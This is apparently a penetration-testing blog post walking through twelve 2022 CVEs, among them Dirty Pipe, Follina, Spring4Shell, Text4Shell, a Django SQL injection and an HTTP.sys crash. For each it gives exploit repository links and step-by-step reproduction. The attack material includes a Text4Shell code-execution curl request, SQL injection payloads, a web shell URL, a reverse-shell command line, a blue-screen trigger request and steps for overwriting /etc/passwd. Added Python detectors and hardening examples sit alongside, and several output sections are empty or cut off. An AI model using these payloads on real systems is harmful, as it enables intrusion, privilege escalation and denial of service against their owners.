17 Jan, 2023

CVE TOP 12 in 2022 for penetration testing


What is CVE or Common Vulnerabilities and Exposures?

CVE (Common Vulnerabilities and Exposures) is a publicly available, free-to-use catalogue of publicly disclosed cyber security vulnerabilities. It is maintained by the MITRE Corporation and funded by the U.S. Department of Homeland Security (through CISA).

Each vulnerability gets a unique identifier of the form CVE-YYYY-NNNNN, a short description and references. The point of the identifier is to give vendors, researchers and tools one name for the same issue, so that the security and technology industries can refer to a common standard.

The CVE list itself does not rate severity. That is the job of the Common Vulnerability Scoring System (CVSS); base scores are published by the NVD and by vendors, and the severity labels used in the headings below (High, Critical) are the CVSS qualitative ratings. Why score at all? We need to know how much damage a particular issue can do before we can prioritise it. The base score only reflects the technology; the temporal and environmental metrics of CVSS let a company adjust it to how the affected component is actually deployed in its own business.

Top 10 threats detected in Ukraine over the month (source):

 1  Multi.Desert.gen             16,67%
 2  Win32.ShadowBrokers.ae        8,89%
 3  IphoneOS.Vortex.a             7,41%
 4  EMSOffce.CVE-2018-0802.gen    5,19%
 5  AndroidOS.Psneuter.a          4,81%
 6  Win32.Agent.gen               4,81%
 7  AndroidOS.Lotoor.cd           3,70%
 8  AndroidOS.Lotoor.bm           3,70%
 9  Win32.ShadowBrokers.aa        2,96%
10  Java.CVE-2013-1493.x          2,96%


Severity High Privilege escalation in Linux kernel (CVE-2022-0847, "Dirty Pipe")

The vulnerability allows a local user to escalate privileges on the system. It exists because the flags of a pipe buffer are not properly initialised: the PIPE_BUF_FLAG_CAN_MERGE flag set by an earlier write to the pipe is not cleared when splice() later reuses the same slot to reference a page of the page cache, so the next write to the pipe is merged straight into that cached page. A local user can therefore overwrite data in the page-cache copy of any file they can open for reading, even if the file is read-only, and go on to execute code with elevated privileges (for example by rewriting /etc/passwd or a SUID binary). The vulnerability was dubbed Dirty Pipe. Linux kernel 5.8 and later are affected.

The vulnerability is patched in Linux 5.16.11, 5.15.25 and 5.10.102.


Clone the repository and follow the instructions for compiling the exploit:



Usage, exploit-1: an unprivileged user changes the root password to "piped".

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):


There is also a scanner for CVE-2022-0847; it simply reports whether the running kernel (here on Kali) is in the vulnerable range.


Usage, exploit-2: inject code into the page-cache copy of a root-owned SUID binary (the file itself is read-only) so that running it drops a root shell; the exploit then restores the original bytes.

For Linux 5.18.0 (which is not vulnerable):

For Linux 5.11.0 (which is vulnerable):

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell..

uid=0(root) gid=0(root) groups=0(root),1001(developer)

Severity Critical Remote code execution in Microsoft Windows (MSDT, CVE-2022-30190, "Follina")

The vulnerability allows a remote attacker to execute arbitrary commands on the target system. It exists because the Microsoft Windows Support Diagnostic Tool (MSDT) does not properly validate the parameters passed to it through the ms-msdt: URL protocol. An unauthenticated attacker tricks the victim into downloading (for example from an e-mail) and opening a specially crafted document; the document loads an external HTML resource whose script invokes ms-msdt: with attacker-controlled parameters, and MSDT executes the embedded commands. Successful exploitation may result in complete compromise of the vulnerable system.


Clone the repository and follow the instructions for compiling the exploit:
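As a defensive counterpart to the exploit, here is an added Python example (not from the exploit repository) that inspects a .docx for the two indicators of this attack: an OLE relationship whose target is external (the document fetches HTML from an attacker's server) and any reference to the ms-msdt: handler, in the document or in the fetched HTML. The sample document it builds is constructed in memory for the test and is not a real malicious file; the host name example.invalid is a placeholder.

```python
"""Scan a .docx (and the HTML it may fetch) for the external OLE relationship and
ms-msdt: references used by the MSDT vulnerability. Added example; not the
exploit repository's code."""
import io
import re
import zipfile

# One <Relationship .../> element and its attributes, from a .rels part.
REL_TAG_RE = re.compile(r"<Relationship\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
# Indicators documented for this attack: the protocol handler itself and the
# diagnostic package / parameter names the public PoC HTML uses.
HTML_INDICATORS = ("ms-msdt:", "PCWDiagnostic", "IT_BrowseForFile")


def relationships(xml: str):
    """Yield each Relationship element as a dict of its attributes."""
    for tag in REL_TAG_RE.findall(xml):
        yield dict(ATTR_RE.findall(tag))


def scan_docx(data: bytes) -> list:
    """Return a list of finding strings for the docx archive in `data`."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith((".rels", ".xml")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for rel in relationships(text):
                # Ordinary hyperlinks are external too; the attack uses an
                # OLE object whose *content* is loaded from the network.
                if (rel.get("TargetMode") == "External"
                        and rel.get("Type", "").endswith("/oleObject")):
                    findings.append(f"{name}: external OLE object target {rel.get('Target')}")
            if "ms-msdt:" in text.lower():
                findings.append(f"{name}: ms-msdt: protocol handler reference")
    return findings


def scan_html(html: str) -> list:
    """Indicators present in the HTML the document would fetch."""
    low = html.lower()
    return [ind for ind in HTML_INDICATORS if ind.lower() in low]


def build_sample_docx(external_target=None) -> bytes:
    """Constructed test input: a minimal (not Word-valid) docx whose
    document.xml.rels carries an external OLE relationship when
    `external_target` is given. Not a real malicious sample."""
    rels = ['<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/styles" Target="styles.xml"/>']
    if external_target:
        rels.append('<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/'
                    'officeDocument/2006/relationships/oleObject" '
                    f'Target="{external_target}" TargetMode="External"/>')
    rels_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                + "".join(rels) + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # The trailing '!' on the target is the quirk the malicious documents use.
    for finding in scan_docx(build_sample_docx("http://example.invalid/payload.html!")):
        print(finding)
```

The scanner deliberately works on the raw relationship XML rather than on a parsed document model, so it also catches files that Word would refuse to open but that a mail gateway still forwards.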

Severity Critical Sensitive Data Exposure in Easyappointments before 1.4.3

Exposure of private personal information to an unauthorized actor in the GitHub repository alextselegidis/easyappointments prior to version 1.4.3: the data can be read without logging in.


Clone the repository and follow the instructions for compiling the exploit:



A vulnerable instance is hosted on localhost; running the PoC dumps its entire database, including the user names, passwords and other PII of the users.

Severity Critical Injection in Atlassian Confluence (OGNL, CVE-2022-26134)

Confluence is a collaborative documentation and project management platform for teams; it gives members a central workspace to track project status. The CVE is an injection into OGNL (Object-Graph Navigation Language), the Java expression language Confluence uses for getting and setting properties of Java objects, among other things. An unauthenticated attacker can place an OGNL expression in the request URI and have it evaluated by the server, which leads to arbitrary code execution.


Clone the repository and follow the instructions for compiling the exploit:



Atlassian Confluence 7.3.5 is used below as the vulnerable environment. An unauthenticated user can execute arbitrary commands.

Severity High Privilege Escalation in Linux Kernel (CVE-2022-0847, Dirty Pipe, second PoC)

The same Dirty Pipe vulnerability as above, exploited with a different PoC: since kernel 5.8 an unprivileged process can overwrite data in arbitrary read-only files, and can therefore inject code into root processes or, as here, rewrite /etc/passwd.


Clone the repository and follow the instructions for compiling the exploit:



1 Create a SHA-512-crypt hash of the password you want for root: openssl passwd -6 --salt THM "PASSWORD"

2 Compile the exploit: gcc poc.c -o exploit

3 Run the exploit to write a root entry with that hash into /etc/passwd:
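Both Dirty Pipe entries on this page give the same facts: affected since 5.8, fixed in 5.16.11, 5.15.25 and 5.10.102. The following added example (not the article's scanner nor the exploit repository's code) turns those ranges into a version check. It assumes that 5.17 and later mainline kernels carry the fix, and it parses the version string only, so a distribution kernel that backported the fix without bumping its version will still be reported as "in range"; treat the result as a prompt to verify, not as proof of exploitability.

```python
"""Kernel-version check for CVE-2022-0847 (Dirty Pipe). Added example; not the
article's scanner and not the exploit repository's code."""
import platform
import re

# Mainline ranges stated on this page: introduced in 5.8, fixed in 5.16.11,
# 5.15.25 and 5.10.102. Assumption: 5.17 and later were released with the fix.
INTRODUCED = (5, 8, 0)
FIXED_IN_BRANCH = {(5, 16): 11, (5, 15): 25, (5, 10): 102}
FIXED_FROM = (5, 17, 0)


def parse_kernel_version(release: str) -> tuple:
    """'5.10.0-9-amd64' -> (5, 10, 0). Distro suffixes after '-' are ignored."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_vulnerable_version(release: str) -> bool:
    """True if a *mainline* kernel with this version is in the Dirty Pipe range.

    Distribution kernels often backport the fix without changing the version,
    so True means 'check further', not 'exploitable'."""
    v = parse_kernel_version(release)
    if v < INTRODUCED or v >= FIXED_FROM:
        return False
    fixed_patch = FIXED_IN_BRANCH.get((v[0], v[1]))
    if fixed_patch is not None and v[2] >= fixed_patch:
        return False
    # 5.8-5.9, 5.11-5.14 and early 5.10 / 5.15 / 5.16 releases are all affected.
    return True


def check_running_kernel() -> str:
    """Human-readable verdict for the kernel this script runs on."""
    release = platform.release()
    try:
        vulnerable = is_vulnerable_version(release)
    except ValueError:
        return f"{release}: not a Linux-style version string, cannot tell"
    state = ("in the vulnerable range (verify distro backports)" if vulnerable
             else "not in the vulnerable range")
    return f"{release}: {state}"


if __name__ == "__main__":
    print(check_running_kernel())
```

On a distribution kernel the next step after a positive result is to read the vendor's changelog for the running package (or simply run the PoC against a scratch file you own) rather than trusting the version number.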

Severity High Apache Spark Shell Command Injection Vulnerability (CVE-2022-33891)

The Apache Spark UI can enforce ACLs through the configuration option spark.acls.enable. With an authentication filter in place, the filter checks whether a user is allowed to view or modify the application. When ACLs are enabled, a code path in HttpSecurityFilter lets a caller impersonate any user by supplying an arbitrary user name in the doAs request parameter. That name reaches a permission check which looks up the user's Unix groups by building a shell command from the name and executing it, so a crafted name gives arbitrary command execution as the user Spark runs as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.


Clone the repository and follow the instructions for compiling the exploit:


Usage, exploit-1: check whether the server is vulnerable: python3 poc.py -u http://localhost -p 8080 --check --verbose

For vulnerable target:

For non- vulnerable target:

Usage, exploit-2: use the PoC to obtain a reverse shell:

python3 poc.py -u http://localhost -p 8080 --revshell -lh <IP> -lp <PORT> --verbose

For vulnerable target:
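The root cause is string-built shell execution. The added example below (Python, modelled on the Spark code path, not Spark's own Scala) shows the vulnerable construction next to two hardened forms: an allow-listed argv call that never touches a shell, and shlex quoting for the case where a shell line is unavoidable. The user-name pattern is an assumption for the example.

```python
"""Vulnerable vs. hardened construction of the group lookup that CVE-2022-33891
abuses. Added Python example modelled on Spark's HttpSecurityFilter ->
ShellBasedGroupsMappingProvider path; not Spark's code."""
import re
import shlex
import subprocess

# Assumed allow-list: POSIX-style account names only.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def unsafe_groups_command(user: str) -> str:
    """What the vulnerable path effectively did: glue the doAs value into a
    shell command line. Returned rather than executed so it can be inspected;
    with user = '`sleep 5`' the shell runs the substitution first."""
    return f'bash -c "id -Gn {user}"'


def safe_groups_argv(user: str) -> list:
    """Hardened form: validate against the allow-list and pass the name as one
    argv element, so no shell ever parses it."""
    if not USERNAME_RE.match(user):
        raise ValueError(f"rejected user name {user!r}")
    return ["id", "-Gn", user]


def quoted_shell_line(user: str) -> str:
    """If a shell line really is unavoidable, quote the value: shlex.quote wraps
    anything containing metacharacters in single quotes, so backticks, $(...)
    and ; become literal characters."""
    return "id -Gn " + shlex.quote(user)


def user_groups(user: str) -> list:
    """Resolve groups with the hardened form (needs a POSIX host with `id`)."""
    out = subprocess.run(safe_groups_argv(user), capture_output=True, text=True, check=False)
    return out.stdout.split()


if __name__ == "__main__":
    probe = "`sleep 5`"          # the shape of the time-based check poc.py sends
    print("vulnerable:", unsafe_groups_command(probe))
    print("quoted:    ", quoted_shell_line(probe))
    try:
        safe_groups_argv(probe)
    except ValueError as e:
        print("argv form: ", e)
```

Of the two hardened forms, prefer the argv one: quoting protects this one call, while the allow-list plus argv removes the shell from the picture entirely, which is also what makes the `--check` probe above (a timing difference) impossible.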

Severity Critical Spring4Shell – Spring Core RCE (CVE-2022-22965)

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.


Start a vulnerable docker image of Spring using the command:

docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

This binds the vulnerable Spring to the address localhost:8082. Visit http://localhost:8082 to check

Clone the exploit from https://github.com/TheGejr/SpringShell and run the following command to check whether the server is vulnerable (on success it writes a web shell, tomcatwar.jsp, into the application root):

python3 exp.py --url http://localhost:8082

You can now run commands by requesting the web shell and changing the value of the cmd parameter (pwd=j is the shell's own password):

a) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami, output of whoami is returned.

b) For url: http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls, the directory listing is returned.

Severity Critical Apache commons-text vulnerability (Text4Shell, CVE-2022-42889)

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers.

These lookups are:
- "script": execute expressions using the JVM script execution engine (javax.script)
- "dns": resolve DNS records
- "url": load values from URLs, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Apache Commons Text versions 1.5 to 1.9 are affected.


Clone the repository https://github.com/akshayithape-devops/CVE-2022-42889-POC and change into it.

Build the vulnerable application image with Docker:

docker build --tag=test/text4shell .

Start a container from the image: docker run -it -p 80:8080 --name text4shell test/text4shell

Open a new terminal tab and get a shell inside the web server container: docker exec -it text4shell /bin/bash

List the files in the directory with ls; you should see text4shell-poc.jar.

Open another terminal and send a request to the web server. The attack passes a string of the form "${prefix:name}" where the prefix is one of the lookups listed above, for example: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch hello.txt')}

For example: the following command should trigger request to make a new file on server:

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D

Run ls again in the container shell: hello.txt now exists, which proves that the request executed code on the server.

bash-4.4# ls
text4shell-poc.jar
bash-4.4# ls
hello.txt  text4shell-poc.jar
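Three of the CVEs on this page (the Confluence OGNL injection, Spring4Shell and Text4Shell) put their payload in the request URL, so they leave traces in ordinary web server access logs. The added example below (not from any of the exploit repositories) decodes each request target and matches it against one rule per CVE. The log lines it scans are constructed samples in Combined Log Format; the Spring4Shell line is written as a GET for illustration, since the real PoCs send the same keys in a POST body, which an access log does not record.

```python
"""Flag access-log requests carrying the injection patterns of three CVEs on
this page: OGNL in the URL path (Confluence), class.module.classLoader binding
keys (Spring4Shell) and ${script:/${dns:/${url:} lookups (Text4Shell). Added
example with constructed log lines; not the exploit repositories' code."""
import re
from urllib.parse import unquote

# Each rule: (label, regex applied to the URL-decoded request target).
RULES = [
    ("ognl-injection (Confluence)", re.compile(r"\$\{[^}]*@[\w.]+@|\$\{[^}]*#")),
    ("class-loader binding (Spring4Shell)", re.compile(r"class\.module\.classLoader\.", re.IGNORECASE)),
    ("StringSubstitutor lookup (Text4Shell)", re.compile(r"\$\{(script|dns|url):", re.IGNORECASE)),
]

# Combined Log Format: client ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def decode_target(target: str) -> str:
    """URL-decode twice: PoCs often double-encode to slip past naive filters."""
    return unquote(unquote(target))


def scan_access_log(lines) -> list:
    """Return (line_no, client, label, decoded_target) for each rule that fires."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        decoded = decode_target(target)
        for label, rx in RULES:
            if rx.search(decoded):
                hits.append((n, client, label, decoded))
    return hits


# Constructed sample lines (not real traffic). Line 1 mirrors the path-based
# Confluence OGNL probe, line 2 a GET-style Spring4Shell property write, line 3
# the Text4Shell request shown above; the last two are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jan/2023:10:00:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.6 - - [17/Jan/2023:10:00:02 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di HTTP/1.1" 200 12',
    '10.0.0.7 - - [17/Jan/2023:10:00:03 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20hello.txt%27%29%7D HTTP/1.1" 200 5',
    '10.0.0.8 - - [17/Jan/2023:10:00:04 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 5',
    '10.0.0.9 - - [17/Jan/2023:10:00:05 +0000] "GET /login.action HTTP/1.1" 200 4321',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit, sep="\t")
```

The rules are intentionally narrow (an `@class@` reference or `#variable` inside `${...}`, the exact Spring binding prefix, the three dangerous lookup names) so that legitimate templating in query strings does not flood the result; widen them only once you have a baseline of what your application's URLs normally contain.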

Severity Critical SQL injection Vulnerability in Django (CVE-2022-28346)

A SQL injection vulnerability was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.

QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed keyword arguments.


Clone the repository and follow the instructions to start a vulnerable server:


Usage, exploit-1: read the SQLite version. The injected alias closes the quoted column name and appends sqlite_version() (URL-encoded, as sent):

,%22,sqlite_version(),%223%22%20--

The response contains test-1 3.39.4, i.e. the database version.

Usage, exploit-2: list all tables of the SQLite database with the same trick:

,%22,tbl_name,%223%22%20FROM%20sqlite_master%20WHERE%20type=%27table%27%20and%20tbl_n
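The payloads above work because the alias (the dictionary key) is placed inside a quoted identifier without escaping. The added example below re-creates that query construction with the standard-library sqlite3 module, so it runs without Django, and shows a check modelled on the validation Django introduced in the fix (the regex and message are an approximation, not Django's code). The users table and its rows are constructed sample data.

```python
"""Why an unescaped column alias is SQL injection (CVE-2022-28346), re-created
with sqlite3 instead of Django. Added example; not Django's code."""
import re
import sqlite3

# Modelled on the check Django added in the fix: reject whitespace, quotes,
# brackets, semicolons and SQL comment markers in aliases (assumed wording).
FORBIDDEN_ALIAS = re.compile(r"""['`"\]\[;\s]|--|/\*|\*/""")


def check_alias(alias: str) -> str:
    if FORBIDDEN_ALIAS.search(alias):
        raise ValueError("Column aliases cannot contain whitespace characters, "
                         "quotation marks, semicolons, or SQL comments.")
    return alias


def vulnerable_query(alias: str) -> str:
    """Build the SELECT the way a naive annotate(**{alias: Value(1)}) did:
    the alias lands inside double quotes without any escaping."""
    return f'SELECT name, 1 AS "{alias}" FROM users'


def safe_query(alias: str) -> str:
    """Same query with the alias validated first, plus doubled quotes as
    belt-and-braces identifier escaping."""
    alias = check_alias(alias).replace('"', '""')
    return f'SELECT name, 1 AS "{alias}" FROM users'


def run(sql: str) -> list:
    """Execute against a throw-away in-memory table (constructed sample data)
    and return the rows as dicts keyed by the column names SQLite reports."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'pbkdf2$...'), ('bob', 'pbkdf2$...')")
    cur = con.execute(sql)
    cols = [d[0] for d in cur.description]
    rows = cur.fetchall()
    con.close()
    return [dict(zip(cols, r)) for r in rows]


# The alias an attacker passes as a dict key: it closes the quoted identifier
# and appends extra select expressions, like the sqlite_version() probe above,
# here also pulling the password column into the result.
INJECTED_ALIAS = 'x", sqlite_version() AS "ver", password AS "pw'

if __name__ == "__main__":
    print(vulnerable_query(INJECTED_ALIAS))
    for row in run(vulnerable_query(INJECTED_ALIAS)):
        print(row)
    try:
        safe_query(INJECTED_ALIAS)
    except ValueError as e:
        print("rejected:", e)
```

Note that doubling the quotes alone would already neutralise this particular payload; the allow-list check is there because an alias is never legitimately attacker-controlled, and rejecting it early gives a clear error instead of a silently odd column name.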

Severity Critical HTTP Protocol Stack Remote Code Execution Vulnerability 

CVE-2022-21907 (CVSSv3 9.8) is a major flaw affecting the HTTP Protocol Stack (HTTP.sys). HTTP.sys is a kernel device driver present in current Microsoft Windows operating systems that is in charge of HTTP traffic processing in services such as Microsoft IIS.

Due to this vulnerability, an attacker can trigger the infamous “Blue Screen of Death” crash in the underlying machine that runs an unpatched HTTP.sys driver. The disruption this vulnerability can cause is rather severe, and although systems might restart and function properly after one attack, subsequent attacks could lead to a complete denial of service.



To reproduce, an IIS server must be running (here on Windows 10 version 2004, OS build 19041.329) with its default page reachable at localhost.

Once that is set up, find the host's IP and send the following curl request; the trigger is the crafted, comma-separated token list in the Accept-Encoding header:

curl -sH "Accept-encoding: 354429474810858105277502,753225473272192695969 *****************267816, *, ," http://<IP>/

After the request is sent, the host goes down with a blue-screen crash.

This Poc can also be reproduced with the Git Repo: https://github.com/ZZ-SOCMAP/CVE-2022-21907

Severity High Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

The vulnerability (CVE-2022-21999), with a CVSS score of 7.8 (High), gives an attacker elevated rights if exploited successfully. A low-privileged user runs the exploit executable, which abuses the Print Spooler to create an administrator account on the host.



To reproduce: log in to the host as a normal user and run the exploit executable; it creates an administrator account with the default password "Passw0rd!".

This Poc can also be reproduced with the Git Repo: https://github.com/ly4k/SpoolFool

Severity Critical F5 BIG-IP iControl REST vulnerability RCE exploit with Java (CVE-2022-1388)

Undisclosed requests may bypass iControl REST authentication. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.




To reproduce: the exploit from the repository below checks whether a host is vulnerable; here it is run against a vulnerable host with the BIG-IP management service exposed.

To demonstrate the impact, an arbitrary command is sent and the server returns its output, without any authentication.

This Poc can also be reproduced with the Git Repo: https://github.com/Zeyad-Azima/CVE-2022-1388

Thanks for reading!
